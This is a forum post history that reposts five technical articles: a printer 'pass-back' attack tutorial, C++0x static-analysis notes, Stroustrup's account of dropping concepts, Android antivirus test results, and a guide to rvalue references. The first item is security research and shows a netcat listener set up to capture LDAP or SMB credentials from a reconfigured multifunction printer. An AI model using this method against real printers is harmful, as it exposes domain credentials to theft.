Everything posted by Nytro

  1. Anatomy of a Pass-Back Attack: Intercepting Authentication Credentials Stored in Multifunction Printers

By Deral (PercX) Heiland and Michael (omi) Belton

At Defcon 19, during my presentation, we discussed a new attack method against printers: tricking the printer into passing LDAP or SMB credentials back to the attacker in plain text. We refer to this as a Pass-Back Attack. It has been a while, but we wanted to release a short tutorial on how this attack is performed.

Over the past year, one focus of the Foofus.NET team has been developing and testing attacks against a number of Multifunction Printer (MFP) devices. A primary goal of this research is to demonstrate the effect of trust relationships between devices that are generally considered benign and critical systems such as Microsoft Windows domains. One of the most interesting attacks developed during this project is what we refer to as a Pass-Back Attack: an attack in which we direct an MFP device to authenticate (via LDAP or SMB) against a rogue system rather than the expected server.

In the following sections we will step through the entire process of a Pass-Back Attack using a Ricoh Aficio MP 5001 as our target device. The attack has been found to work on a number of Ricoh or rebranded Ricoh systems, and also against a large number of MFP devices manufactured by Sharp; we expect there are many other devices it will work against. The attack will be performed using a web browser, Netcat, and a web proxy.

First, we need to create a rogue listener that will capture the authentication attempt initiated from the MFP. This is a relatively easy problem to solve: we simply set up a listener using Netcat. In this attack we will use port 1389.

$ nc -l 1389
If you’re reading this, you’re probably well aware that binding to a privileged port requires some form of administrative account such as "root." We prefer non-privileged ports for this attack because they allow us to demonstrate how unprivileged access on one system can be used to gain privileged access to another system. A demonstration of this involves a scenario where you have remote (user-level) access to a device on a filtered subnet and are looking to gain more privileged access to a wider set of systems. Additionally, this approach highlights the fact that LDAP can be configured to authenticate against any software listening on any port.

Download: http://www.foofus.net/~percX/praeda/pass-back-attack.pdf

Source: http://www.foofus.net/?p=468
  2. Static code analysis and the new language standard C++0x

April 14, 2010 9:00 PM PDT

Contents: Abstract; Introduction; 1. auto; 2. decltype; 3. R-value reference; 4. Right angle brackets; 5. Lambdas; 6. Suffix return type syntax; 7. static_assert; 8. nullptr; 9. New standard classes; 10. New trends in development of static code analyzers; Summary; References.

Abstract

The article discusses the new capabilities of the C++ language described in the C++0x standard and supported in Visual Studio 2010. Using PVS-Studio as an example, we will see how the changes in the language influence static code analysis tools.

Introduction

The new C++ language standard is about to come into our lives. It is still called C++0x, although its final name will apparently be C++11. The new standard is partially supported by modern C++ compilers, for example Intel C++ and Visual C++. This support is far from complete, which is understandable: first, the standard has not been ratified yet, and second, it will take time to introduce its specifics into compilers even once it is.

Compiler developers are not the only ones for whom support of the new standard is important; the language innovations must quickly be supported in static source code analyzers as well. The new standard promises backward compatibility: old C++ code is almost guaranteed to compile correctly with new compilers without any modifications. But that does not mean a program that contains no new language constructs can still be processed by a static analyzer that does not support C++0x. We became convinced of this in practice when trying to check a project created in the beta version of Visual Studio 2010 with PVS-Studio: the problem lies in the header files, which already use the new language constructs.
For example, the header file "stddef.h" uses the new operator decltype:

namespace std { typedef decltype(__nullptr) nullptr_t; }

Such constructs are naturally considered syntactically wrong by an analyzer that does not support C++0x, and either cause the program to abort or produce incorrect results. It became obvious that we had to support C++0x in PVS-Studio by the time Visual Studio 2010 was released, at least to the extent the compiler does. We may say that we have accomplished this: by the time of writing, the new version PVS-Studio 3.50, which integrates into both Visual Studio 2005/2008 and Visual Studio 2010, is available on our site. Beginning with version 3.50, the tool supports the same part of the C++0x standard as Visual Studio 2010. This support is not perfect (for example, in the case of "right angle brackets"), but we will continue developing C++0x support in the next versions.

In this article we will study the new features of the language supported in the first edition of Visual Studio 2010, looking at each from several viewpoints: what the new ability is, whether it relates to 64-bit errors, how the new language construct is supported in PVS-Studio, and how its appearance impacts the VivaCore library.

Note. VivaCore is an open-source library for code parsing, analysis and transformation, supporting C and C++. PVS-Studio is based on VivaCore, and other software projects may be built on the library as well.

This article may be called a report on the investigation and support of the new standard in PVS-Studio. The PVS-Studio tool diagnoses 64-bit and parallel OpenMP errors.
But since the topic of moving to 64-bit systems is more relevant at the moment, we will mostly consider examples that show how to detect 64-bit errors with PVS-Studio.

1. auto

As in C, the type of a variable in C++ must be defined explicitly. But with the appearance of template types and template metaprogramming techniques in C++, the type of an object is often not easy to spell out. Even in a rather simple case (searching for array items) we need to define the type of an iterator in the following way:

for (vector<int>::iterator itr = myvec.begin(); itr != myvec.end(); ++itr)

Such constructs are long and cumbersome. We could use typedef to shorten them, but that spawns new entities and does little for convenience. C++0x offers its own technique to make this issue less painful: the meaning of the keyword auto is changed in the new standard. Previously, auto meant that a variable was created on the stack, and it was implied if you did not specify otherwise (for example, register); now it is analogous to var in C# 3.0. The type of a variable declared auto is determined by the compiler from the object that initializes the variable. Note that an auto variable cannot store values of different types during one program run: C++ remains a statically typed language, and with auto we merely tell the compiler to deduce the type on its own; once the variable is initialized, its type cannot change. Now the iterator can be defined this way:

for (auto itr = myvec.begin(); itr != myvec.end(); ++itr)

Besides mere convenience and simplification of the code, the keyword auto makes it safer.
Let us consider an example where auto makes the code safe from the viewpoint of 64-bit software development:

bool Find_Incorrect(const string *arrStr, size_t n)
{
  for (size_t i = 0; i != n; ++i)
  {
    unsigned n = arrStr[i].find("ABC");
    if (n != string::npos)
      return true;
  }
  return false;
}

This code has a 64-bit error: the function behaves correctly in the Win32 build and fails in the Win64 build. The error is in using the type unsigned for the variable "n", where string::size_type, the type returned by find(), must be used. In a 32-bit program, string::size_type and unsigned coincide and we get correct results. In a 64-bit program they no longer coincide: when the substring is not found, find() returns string::npos, which equals 0xFFFFFFFFFFFFFFFFui64. This value is truncated to 0xFFFFFFFFu and placed into the 32-bit variable. As a result, the condition 0xFFFFFFFFu != 0xFFFFFFFFFFFFFFFFui64 is true, and Find_Incorrect always returns true.

In this example the error is not so dangerous, because it is detected even by the compiler, not to speak of a specialized analyzer such as Viva64 (included in PVS-Studio). This is how the compiler detects the error:

warning C4267: 'initializing' : conversion from 'size_t' to 'unsigned int', possible loss of data

And this is how Viva64 does:

V103: Implicit type conversion from memsize to 32-bit type.

Most importantly, this error is quite possible and occurs often in real code due to an inaccurate choice of type for the returned value; it may appear simply because the programmer is reluctant to write a cumbersome construct like string::size_type. Now we can easily avoid such errors without cluttering the code.
Using auto, we may write simple and safe code:

auto n = arrStr[i].find("ABC");
if (n != string::npos)
  return true;

The error disappears by itself, and the code has become no more complicated or less efficient. The conclusion: in many cases it is reasonable to use auto. The keyword auto will reduce the number of 64-bit errors or let you eliminate them more gracefully. But auto does not by itself guarantee that all 64-bit errors will be eliminated! It is just one more language tool that makes programmers' lives easier; it does not take over all their work of managing types. Consider this example:

void *AllocArray3D(int x, int y, int z, size_t objectSize) {
  int size = x * y * z * objectSize;
  return malloc(size);
}

The function must calculate the array size and allocate the necessary amount of memory. It is logical to expect that it can allocate memory for a 2000*2000*2000 array of double in a 64-bit environment. But a call like "AllocArray3D(2000, 2000, 2000, sizeof(double));" will always return NULL, as if it were impossible to allocate that much memory. The true reason is the overflow in the expression "int size = x * y * z * sizeof(double)": the variable size takes the value -424509440, and the subsequent call to malloc is senseless. By the way, the compiler will also warn that this expression is unsafe:

warning C4267: 'initializing' : conversion from 'size_t' to 'int', possible loss of data

Relying on auto, a careless programmer might modify the code in the following way:

void *AllocArray3D(int x, int y, int z, size_t objectSize) {
  auto size = x * y * z * objectSize;
  return malloc(size);
}

But this does not eliminate the error at all; it only hides it. The compiler no longer generates a warning, yet AllocArray3D still returns NULL.
The type of the variable size automatically becomes size_t, but the overflow occurs while calculating the subexpression "x * y * z": it has the type int at first and is only extended to size_t when multiplied by the variable "objectSize". Now this hidden error may be found only with the help of the Viva64 analyzer:

V104: Implicit type conversion to memsize type in an arithmetic expression.

The conclusion: you must stay attentive even when using auto.

Let us now look briefly at how the new keyword is supported in the VivaCore library on which the Viva64 analyzer is based. The analyzer must understand that the variable AA has the type int, so that it can warn (see V101) about the extension of AA to size_t:

void Foo(int X, int Y) {
  auto AA = X * Y;
  size_t BB = AA; //V101
}

First of all, a new table of lexemes was composed that includes the new C++0x keywords. This table is stored in the file Lex.cc and is named tableC0xx. To avoid modifying the old code responsible for processing the lexeme "auto" (tkAUTO), the new one got the name tkAUTOcpp0x in this table. With the appearance of the new lexeme, the functions isTypeToken and optIntegralTypeOrClassSpec were modified. A new class, LeafAUTOc0xx, appeared, and TypeInfoId gained a new object class, AutoDecltypeType. The letter 'x' was chosen to encode the type auto, which is reflected in functions of the TypeInfo and Encoding classes, for example IsAutoCpp0x and MakePtree. These corrections let you parse code using the keyword auto in its new meaning and save the types of objects in encoded form (the letter 'x'). But they do not tell you what type is actually assigned to the variable; that is, VivaCore lacks the functionality to establish that the variable AA in the expression "auto AA = X * Y" will have the type int.
This functionality is implemented in the source code of Viva64 and cannot be integrated into the VivaCore library. The implementation principle is additional type-calculation work in the TranslateAssignInitializer method: after the right side of the expression is evaluated, the association (Bind) between the variable's name and its type is replaced with a new one.

FULL article: http://software.intel.com/en-us/articles/static-code-analysis-and-the-new-language-standard-c0x/
  3. No 'Concepts' in C++0x

Overload Journal #92 - August 2009
Author: Bjarne Stroustrup

There have been some major decisions made about the next C++ Standard. Bjarne Stroustrup explains what's changed and why.

At the July 2009 Frankfurt meeting of the ISO C++ Standards Committee (WG21) [iSO], the 'concepts' mechanism for specifying requirements for template arguments was 'decoupled' (my less-diplomatic phrase was 'yanked out'). That is, 'concepts' will not be in C++0x or its standard library. That - in my opinion - is a major setback for C++, but not a disaster; and some alternatives were even worse.

I have worked on 'concepts' for more than seven years and looked at the problems they aim to solve much longer than that. Many have worked on 'concepts' for almost as long. For example, see (listed in chronological order):

Bjarne Stroustrup and Gabriel Dos Reis: 'Concepts - Design choices for template argument checking'. October 2003. An early discussion of design criteria for 'concepts' for C++. [stroustrup03a]
Bjarne Stroustrup: 'Concept checking - A more abstract complement to type checking'. October 2003. A discussion of models of 'concept' checking. [stroustrup03b]
Bjarne Stroustrup and Gabriel Dos Reis: 'A concept design' (Rev. 1). April 2005. An attempt to synthesize a 'concept' design based on (among other sources) N1510, N1522, and N1536. [stroustrup05]
Jeremy Siek et al.: 'Concepts for C++0x'. N1758==05-0018. May 2005. [siek05]
Gabriel Dos Reis and Bjarne Stroustrup: 'Specifying C++ Concepts'. POPL06. January 2006. [Reis06]
Douglas Gregor and Bjarne Stroustrup: 'Concepts'. N2042==06-0012. June 2006. The basis for all further 'concepts' work for C++0x. [Gregor06a]
Douglas Gregor et al.: 'Concepts: Linguistic Support for Generic Programming in C++'. OOPSLA'06, October 2006. An academic paper on the C++0x design and its experimental compiler ConceptGCC. [Gregor06b]
Pre-Frankfurt working paper (with 'concepts' in the language and standard library): 'Working Draft, Standard for Programming Language C++'. N2914=09-0104. June 2009. [Frankfurt09]
B. Stroustrup: 'Simplifying the use of concepts'. N2906=09-0096. June 2009. [stroustrup09]

It need not be emphasized that I and others are quite disappointed. The fact that some alternatives are worse is cold comfort, and I can offer no quick and easy remedies.

Please note that the C++0x improvements to the C++ features that most programmers see and directly use are unaffected. C++0x will still be a more expressive language than C++98, with support for concurrent programming, a better standard library, and many improvements that make it significantly easier to write good (i.e., efficient and maintainable) code. In particular, every example I have ever given of C++0x code (e.g., in 'Evolving a language in and for the real world: C++ 1991-2006' [stroustrup07] at ACM HOPL-III [HOPL]) that does not use the keywords 'concept' or 'requires' is unaffected. See also my C++0x FAQ [FAQ]. Some people even rejoice that C++0x will now be a simpler language than they had expected.

'Concepts' were to have been the central new feature in C++0x for putting the use of templates on a better theoretical basis, for firming up the specification of the standard library, and a central part of the drive to make generic programming more accessible for mainstream use. For now, people will have to use 'concepts' without direct language support, as a design technique. My best scenario for the future is that we get something better than the current 'concept' design into C++ in about five years. Getting that will take some serious, focused work by several people (but not 'design by committee').

What happened?

'Concepts', as developed over the last many years and accepted into the C++0x working paper in 2008, involved some technical compromises (which is natural and necessary).
The experimental implementation was sufficient to test the 'conceptualized' standard library, but was not production quality. The latter worried some people, but I personally considered it sufficient as a proof of concept. My concern was with the design of 'concepts', and in particular with the usability of 'concepts' in the hands of 'average programmers'. That concern was shared by several members. The stated aim of 'concepts' was to make generic programming more accessible to most programmers [stroustrup03a], but that aim seemed to me to have been seriously compromised: rather than making generic programming more accessible, 'concepts' were becoming yet another tool in the hands of experts (only).

Over the last half year or so, I had been examining C++0x from a user's point of view, and I worried that even the use of libraries implemented using 'concepts' would put new burdens on programmers. I felt that the design of 'concepts' and its use in the standard library did not adequately reflect our experience with 'concepts' over the last few years. Then, a few months ago, Alisdair Meredith (an insightful committee member from the UK) and Howard Hinnant (the head of the standard library working group) asked some good questions relating to who should directly use which parts of the 'concepts' facilities and how. That led to a discussion of usability involving many people with a variety of concerns and points of view, and I eventually - after much confused discussion - published my conclusions [stroustrup09]. To summarize and somewhat oversimplify, I stated that:

'Concepts' as currently defined are too hard to use and will lead to disuse of 'concepts', possibly disuse of templates, and possibly to lack of adoption of C++0x.
A small set of simplifications [stroustrup09] can render 'concepts' good-enough-to-ship on the current schedule for C++0x, or with only a minor slip.

That's pretty strong stuff.
Please remember that standards committee discussions are typically quite polite, and since we are aiming for consensus, we tend to avoid direct confrontation. Unfortunately, the resulting further (internal) discussion was massive (hundreds of more and less detailed messages) and confused. No agreement emerged on what problems (if any) needed to be addressed or how. This led me to order the alternatives for a presentation in Frankfurt:

'Fix and ship'
Remaining work: remove explicit 'concepts', add explicit refinement, add 'concept'/type matching, handle 'concept' map scope problems
Risks: no implementation, complexity of description
Schedule: no change or one meeting

'Yank and ship'
Remaining work: yank (core and standard library)
Risks: old template problems remain, disappointment in 'progressive' community ('seven years' work down the drain')
Schedule: five years to 'concepts' (complete redesign needed) or never

'Status quo'
Remaining work: details
Risks: unacceptable programming model, complexity of description (alternative view: none)
Schedule: no change

I and others preferred the first alternative ('fix and ship') and considered it feasible. However, a large majority of the committee disagreed and chose the second alternative ('yank and ship', renaming it 'decoupling'). In my opinion, both are better than the third alternative ('status quo'). My interpretation of that vote is that, given the disagreement among proponents of 'concepts', the whole idea seemed controversial to some; some were already worried about the ambitious schedule for C++0x (and, unfairly IMO, blamed 'concepts'); and some were never enthusiastic about 'concepts'. Given that, 'fixing concepts' ceased to be a realistic option. Essentially, all expressed support for 'concepts', just 'later' and 'eventually'. I warned that a long delay was inevitable if we removed 'concepts' now, because in the absence of schedule pressures essentially all design decisions will be re-evaluated.
Surprisingly (maybe), there were no technical presentations and discussions about 'concepts' in Frankfurt. The discussion focused on timing, and my impression is that the vote was decided primarily on timing concerns.

Please don't condemn the committee for being cautious. This was not a 'Bjarne vs. the committee' fight, but a discussion trying to balance a multitude of serious concerns. I and others are disappointed that we didn't take the opportunity of 'fix and ship', but C++ is not an experimental academic language. Unless members are convinced that the risks of doing harm to production code are very low, they must oppose. Collectively, the committee is responsible for billions of lines of code. For example, lack of adoption of C++0x, or long-term continued use of unconstrained templates in the presence of 'concepts', would lead to a split of the C++ community into separate sub-communities. Thus, a poor 'concept' design could be worse than no 'concepts'. Given the choice between the two, I too voted for removal. I prefer a setback to a likely disaster.

Technical issues

The unresolved issues about 'concepts' focused on the distinction between explicit and implicit 'concept' maps (see [stroustrup09]):

Should a type that meets the requirements of a 'concept' automatically be accepted where the 'concept' is required (e.g. should a type X that provides +, -, *, and / with suitable parameters automatically match a 'concept' C that requires the usual arithmetic operations with suitable parameters), or should an additional explicit statement (a 'concept' map from X to C) that a match is intentional be required? (My answer: use automatic match in almost all cases.)
Should there be a choice between automatic and explicit 'concepts', and should a designer of a 'concept' be able to force every user to follow his choice? (My answer: all 'concepts' should be automatic.)
Should a type X that provides a member operation X::begin() be considered a match for a 'concept' C<T> that requires a function begin(T), or should a user supply a 'concept' map from T to C? An example is std::vector and std::Range. (My answer: it should match.)

The 'status quo before Frankfurt' answers all differ from my suggestions. Obviously, I have had to simplify my explanation here and omit most details and most rationale. I cannot reenact the whole technical discussion here, but this is my conclusion: in the 'status quo' design, 'concept' maps are used for two things:

To map types to 'concepts' by adding/mapping attributes
To assert that a type matches a 'concept'.

Somehow, the latter came to be seen as an essential function by some people, rather than an unfortunate rare necessity. When two 'concepts' differ semantically, what is needed is not an assertion that a type meets one and not the other 'concept' (this is, at best, a workaround - an indirect and elaborate attack on the fundamental problem), but an assertion that a type has the semantics of the one and not the other 'concept' (fulfills the axiom(s) of the one and not the other). For example, the STL input iterator and forward iterator have a key semantic difference: you can traverse a sequence defined by forward iterators twice, but not a sequence defined by input iterators; e.g., applying a multi-pass algorithm to an input stream is not a good idea. The solution in the 'status quo' is to force every user to say which types match a forward iterator and which types match an input iterator. My suggested solution adds up to: if (and only if) you want to use semantics that are not common to two 'concepts', and the compiler cannot deduce which 'concept' is a better match for your type, you have to say which semantics your type supplies; e.g., 'my type supports multi-pass semantics'. One might say: 'When all you have is a 'concept' map, everything looks like needing a type/'concept' assertion.'
At the Frankfurt meeting, I summarized. Why do we want 'concepts'?

To make requirements on types used as template arguments explicit
Precise documentation
Better error messages
Overloading

Different people have different views and priorities. However, at this high level there can be confusion, but little or no controversy: every half-way reasonable 'concept' design offers all of that. What concerns do people have?

Programmability
Complexity of formal specification
Compile time
Run time

My personal concerns focus on 'programmability' (ease of use, generality, teachability, scalability); the complexity of the formal specification (40 pages of standards text) is secondary. Others worry about compile time and run time. However, I think the experimental implementation (ConceptGCC [Gregor06b]) shows that run time for constrained templates (using 'concepts') can be made as good as or better than that of current unconstrained templates. ConceptGCC is indeed very slow, but I don't consider that fundamental.

When it comes to validating an idea, we hit the traditional dilemma. With only minor oversimplification, the horns of the dilemma are:

'Don't standardize without commercial implementation'
'Major implementers do not implement without a standard'

Somehow, a detailed design and an experimental implementation have to become the basis for a compromise. My principles for 'concepts' are:

Duck typing - the key to the success of templates for GP (compared to OO with interfaces and more).
Substitutability - never call a function with a stronger precondition than is 'guaranteed'.
'Accidental match' is a minor problem - not in the top 100 problems.

My 'minimal fixes' to 'concepts' as present in the pre-Frankfurt working paper were:

'Concepts' are implicit/auto - to make duck typing the rule.
Explicit refinement - to handle substitutability problems.
General scoping of 'concept' maps - to minimize 'implementation leakage'.
Simple type/'concept' matching - to make vector a range without a redundant 'concept' map.

For details, see [stroustrup09].

No C++0x, long live C++1x

Even after cutting 'concepts', the next C++ standard may be delayed. Sadly, there will be no C++0x (unless you count the minor corrections in C++03). We must wait for C++1x, and hope that 'x' will be a low digit. There is hope, because C++1x is now feature complete (excepting the possibility of some national standards bodies effectively insisting on some feature present in the formal proposal for the standard). 'All' that is left is the massive work of resolving outstanding technical issues and comments. A list of features and some discussion can be found on my C++0x FAQ [FAQ]. Here is a subset:

atomic operations
auto (type deduction from initializer)
C99 features
enum class (scoped and strongly typed enums)
constant expressions (generalized and guaranteed; constexpr)
defaulted and deleted functions (control of defaults)
delegating constructors
in-class member initializers
inherited constructors
initializer lists (uniform and general initialization)
lambdas
memory model
move semantics; see rvalue references
null pointer (nullptr)
range for statement
raw string literals
template alias
thread-local storage (thread_local)
unicode characters
uniform initialization syntax and semantics
user-defined literals
variadic templates

and libraries:

improvements to algorithms
containers
duration and time_point
function and bind
forward_list - a singly-linked list
future and promise
garbage collection ABI
hash_tables; see unordered_map
metaprogramming and type traits
random number generators
regex - a regular expression library
scoped allocators
smart pointers; see shared_ptr, weak_ptr, and unique_ptr
threads
atomic operations
tuple

Even without 'concepts', C++1x will be a massive improvement on C++98, especially when you consider that these features (and more) are designed to interoperate for maximum expressiveness and flexibility.
I hope we will see 'concepts' in a revision of C++ in maybe five years. Maybe we could call that C++1y or even 'C++y!'

References

[FAQ] Bjarne Stroustrup, 'C++0x - the next ISO C++ standard' (FAQ), available from: C++11 FAQ
[Frankfurt09] 'Working Draft, Standard for Programming Language C++', a pre-Frankfurt working paper, June 2009, available from: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2009/n2914.pdf
[Gregor06a] Douglas Gregor and Bjarne Stroustrup, June 2006, 'Concepts', available from: http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2006/n2042.pdf
[Gregor06b] Douglas Gregor, Jaakko Jarvi, Jeremy Siek, Bjarne Stroustrup, Gabriel Dos Reis and Andrew Lumsdaine, October 2006, 'Concepts: Linguistic support for generic programming in C++', available from: http://www.research.att.com/~bs/oopsla06.pdf
[HOPL] Proceedings of the History of Programming Languages conference 2007, available from: http://portal.acm.org/toc.cfm?id=1238844
[iSO] The C++ Standards Committee - ISO/IEC JTC1/SC22/WG21
[Reis06] Gabriel Dos Reis and Bjarne Stroustrup, January 2006, 'Specifying C++ concepts', available from: http://www.research.att.com/~bs/popl06.pdf
[siek05] Jeremy Siek, Douglas Gregor, Ronald Garcia, Jeremiah Willcock, Jaakko Jarvi and Andrew Lumsdaine, May 2005, 'Concepts for C++0x', available from: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1758.pdf
[stroustrup03a] Bjarne Stroustrup and Gabriel Dos Reis, October 2003, 'Concepts - Design choices for template argument checking', available from: http://www.research.att.com/~bs/N1522-concept-criteria.pdf
[stroustrup03b] Bjarne Stroustrup, October 2003, 'Concept checking - A more abstract complement to type checking', available from: http://www.research.att.com/~bs/n1510-concept-checking.pdf
[stroustrup05] Bjarne Stroustrup and Gabriel Dos Reis, April 2005, 'A concept design (Rev. 1)', available from: http://www.research.att.com/~bs/n1782-concepts-1.pdf
[stroustrup07] Bjarne Stroustrup, May 2007, 'Evolving a language in and for the real world: C++ 1991-2006', available from: http://www.research.att.com/~bs/hopl-almost-final.pdf
[stroustrup09] Bjarne Stroustrup, 'Simplifying the use of concepts', available from: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2009/n2906.pdf

Source: ACCU :: No 'Concepts' in C++0x
  4. 14 Android security suites tested against 181 viruses by Faravirusi.com

Andrei Avădănei - November 1, 2011 at 3:00

Yesterday FaraVirusi.com launched one of the largest detection tests for the Android platform carried out by an independent site. At the moment there are about 600 viruses for the Android platform. The number of smartphone users running this operating system keeps growing, and the interest from malware creators is just as strong. For this audit, a set of 181 infected applications (.apk) from July-October of this year was used, and the 14 main security products for Android were tested. Here are the detection results:

Kaspersky* – 175 detected (96.68%)
Dr.Web – 171 detected (94.47%)
IKARUS – 170 detected (93.92%)
F-Secure* – 164 detected (90.60%)
Zoner – 163 detected (90.05%)
VIPRE** – 159 detected (87.84%)
ESET** – 151 detected (83.42%)
BitDefender* – 124 detected (68.50%)
BullGuard* – 119 detected (65.74%)
NetQin – 116 detected (64.08%)
Webroot – 115 detected (63.53%)
Trend Micro – 100 detected (55.24%)
McAfee* – 53 detected (29.28%)
BlackBelt* – 41 detected (22.65%)

When it comes to a security solution for your phone, detection is not the only aspect to take into account. The impact on battery life is also very important, and here NetQin, BitDefender and Zoner Antivirus excel: these products will not consume more than 1-2% of the battery. On the other hand, Dr.Web, VIPRE and Lookout, along with Webroot, can have a larger impact on the battery. Secondly, the features offered in a free version matter, and recovering a lost phone is just as important as antivirus detection. Here NetQin and BitDefender abound in options and features offered to users at no cost, ranging from antivirus, anti-lost and web protection to protection against phone tapping, backup and system optimization. Moreover, paying for an Android security solution is not justified at this point, given that the free ones perform very well and offer many features beyond antivirus detection. Still, if you do want to make such an investment, the recommendation is, without a doubt, Kaspersky. For those who do not consider the investment worthwhile, our recommendations for free protection for your Android phone are Dr.Web and NetQin. One recommendation goes to Dr.Web, thanks to its very good detection; on the other hand, it offers nothing extra in the free version, so whether to install it is debatable. The second recommendation is NetQin, for its reasonable detection and the numerous features it offers; the product also comes with a dual engine: classic and cloud. IKARUS is a new product that offers only antivirus protection and has some stability problems. Zoner is little known on the market and was created by a former hacker.

Notes: Products marked with * are paid products, and those marked with ** are still in Beta testing. 1. Norton Mobile Security LITE is not available in Romania. 2. BitDefender, ESET and VIPRE are in Beta testing, and BitDefender will become a paid product starting in November. 3. Lookout and G Data do not offer on-demand scanning of the card contents or the phone's memory.

Sursa: http://www.worldit.info/noutati/14-suite-de-securitate-pentru-android-testate-pe-181-de-virusi-de-faravirusi-com/
  5. C++ A Brief Introduction to Rvalue References

by Howard E. Hinnant, Bjarne Stroustrup, and Bronek Kozicki
March 10, 2008

Summary

Rvalue references are a small technical extension to the C++ language. Rvalue references allow programmers to avoid logically unnecessary copying and to provide perfect forwarding functions. They are primarily meant to aid in the design of higher performance and more robust libraries.

Introduction

This document gives a quick tour of the new C++ language feature rvalue reference. It is a brief tutorial, rather than a complete reference. For details, see these references.

The rvalue reference

An rvalue reference is a compound type very similar to C++'s traditional reference. To better distinguish these two types, we refer to a traditional C++ reference as an lvalue reference. When the term reference is used, it refers to both kinds of reference: lvalue reference and rvalue reference. An lvalue reference is formed by placing an & after some type.

A a;
A& a_ref1 = a;  // an lvalue reference

An rvalue reference is formed by placing an && after some type.

A a;
A&& a_ref2 = a;  // an rvalue reference

An rvalue reference behaves just like an lvalue reference except that it can bind to a temporary (an rvalue), whereas you cannot bind a (non const) lvalue reference to an rvalue.

A& a_ref3 = A();   // Error!
A&& a_ref4 = A();  // Ok

Question: Why on Earth would we want to do this?! It turns out that the combination of rvalue references and lvalue references is just what is needed to easily code move semantics. The rvalue reference can also be used to achieve perfect forwarding, a heretofore unsolved problem in C++. From a casual programmer's perspective, what we get from rvalue references is more general and better performing libraries.

Move Semantics

Eliminating spurious copies

Copying can be expensive. For example, for std::vectors, v2=v1 typically involves a function call, a memory allocation, and a loop.
This is of course acceptable where we actually need two copies of a vector, but in many cases, we don't: We often copy a vector from one place to another, just to proceed to overwrite the old copy. Consider:

template <class T> void swap(T& a, T& b)
{
    T tmp(a);  // now we have two copies of a
    a = b;     // now we have two copies of b
    b = tmp;   // now we have two copies of tmp (aka a)
}

But, we didn't want to have any copies of a or b, we just wanted to swap them. Let's try again:

template <class T> void swap(T& a, T& b)
{
    T tmp(std::move(a));
    a = std::move(b);
    b = std::move(tmp);
}

This move() gives its target the value of its argument, but is not obliged to preserve the value of its source. So, for a vector, move() could reasonably be expected to leave its argument as a zero-capacity vector to avoid having to copy all the elements. In other words, move is a potentially destructive read. In this particular case, we could have optimized swap by a specialization. However, we can't specialize every function that copies a large object just before it deletes or overwrites it. That would be unmanageable. The first task of rvalue references is to allow us to implement move() without verbosity, or runtime overhead.

move

The move function really does very little work. All move does is accept either an lvalue or rvalue argument, and return it as an rvalue without triggering a copy construction:

template <class T>
typename remove_reference<T>::type&&
move(T&& a)
{
    return a;
}

It is now up to client code to overload key functions on whether their argument is an lvalue or rvalue (e.g. copy constructor and assignment operator). When the argument is an lvalue, the argument must be copied from. When it is an rvalue, it can safely be moved from.

Overloading on lvalue / rvalue

Consider a simple handle class that owns a resource and also provides copy semantics (copy constructor and assignment).
For example a clone_ptr might own a pointer, and call clone() on it for copying purposes:

template <class T> class clone_ptr
{
private:
    T* ptr;
public:
    // construction
    explicit clone_ptr(T* p = 0) : ptr(p) {}
    // destruction
    ~clone_ptr() {delete ptr;}
    // copy semantics
    clone_ptr(const clone_ptr& p)
        : ptr(p.ptr ? p.ptr->clone() : 0) {}
    clone_ptr& operator=(const clone_ptr& p)
    {
        if (this != &p)
        {
            delete ptr;
            ptr = p.ptr ? p.ptr->clone() : 0;
        }
        return *this;
    }
    // move semantics
    clone_ptr(clone_ptr&& p)
        : ptr(p.ptr) {p.ptr = 0;}
    clone_ptr& operator=(clone_ptr&& p)
    {
        std::swap(ptr, p.ptr);
        return *this;
    }
    // Other operations
    T& operator*() const {return *ptr;}
    // ...
};

Except for the highlighted move semantics section above, clone_ptr is code that you might find in today's books on C++. Clients of clone_ptr might use it like so:

clone_ptr<base> p1(new derived);
// ...
clone_ptr<base> p2 = p1;  // p2 and p1 each own their own pointer

Note that copy constructing or assigning a clone_ptr is a relatively expensive operation. However when the source of the copy is known to be an rvalue, one can avoid the potentially expensive clone() operation by pilfering the rvalue's pointer (no one will notice!). The move constructor above does exactly that, leaving the rvalue in a default constructed state. The move assignment operator simply swaps state with the rvalue. Now when code tries to copy an rvalue clone_ptr, or if that code explicitly gives permission to consider the source of the copy an rvalue (using std::move), the operation will execute much faster.

clone_ptr<base> p1(new derived);
// ...
clone_ptr<base> p2 = std::move(p1);  // p2 now owns the pointer instead of p1

For classes made up of other classes (via either containment or inheritance), the move constructor and move assignment can easily be coded using the std::move function:

class Derived : public Base
{
    std::vector<int> vec;
    std::string name;
    // ...
public:
    // ...
    // move semantics
    Derived(Derived&& x)             // rvalues bind here
        : Base(std::move(x)),
          vec(std::move(x.vec)),
          name(std::move(x.name)) { }
    Derived& operator=(Derived&& x)  // rvalues bind here
    {
        Base::operator=(std::move(x));
        vec = std::move(x.vec);
        name = std::move(x.name);
        return *this;
    }
    // ...
};

Each subobject will now be treated as an rvalue when binding to the subobject's constructors and assignment operators. std::vector and std::string have move operations coded (just like our earlier clone_ptr example) which will completely avoid the tremendously more expensive copy operations. Note above that the argument x is treated as an lvalue internal to the move functions, even though it is declared as an rvalue reference parameter. That's why it is necessary to say move(x) instead of just x when passing down to the base class. This is a key safety feature of move semantics designed to prevent accidentally moving twice from some named variable. All moves occur only from rvalues, or with an explicit cast to rvalue such as using std::move. If you have a name for the variable, it is an lvalue.

Question: What about types that don't own resources? (E.g. std::complex?) No work needs to be done in that case. The copy constructor is already optimal when copying from rvalues.

Movable but Non-Copyable Types

Some types are not amenable to copy semantics but can still be made movable. For example:

fstream
unique_ptr (non-shared, non-copyable ownership)
A type representing a thread of execution

By making such types movable (though still non-copyable) their utility is tremendously increased. Movable but non-copyable types can be returned by value from factory functions:

ifstream find_and_open_data_file(/* ... */);
...
ifstream data_file = find_and_open_data_file(/* ... */);  // No copies!

In the above example, the underlying file handle is passed from object to object, as long as the source ifstream is an rvalue.
At all times, there is still only one underlying file handle, and only one ifstream owns it at a time. Movable but non-copyable types can also safely be put into standard containers. If the container needs to "copy" an element internally (e.g. vector reallocation) it will move the element instead of copying it.

vector<unique_ptr<base>> v1, v2;
v1.push_back(unique_ptr<base>(new derived()));  // ok, moving, not copying
...
v2 = v1;        // Compile time error. This is not a copyable type.
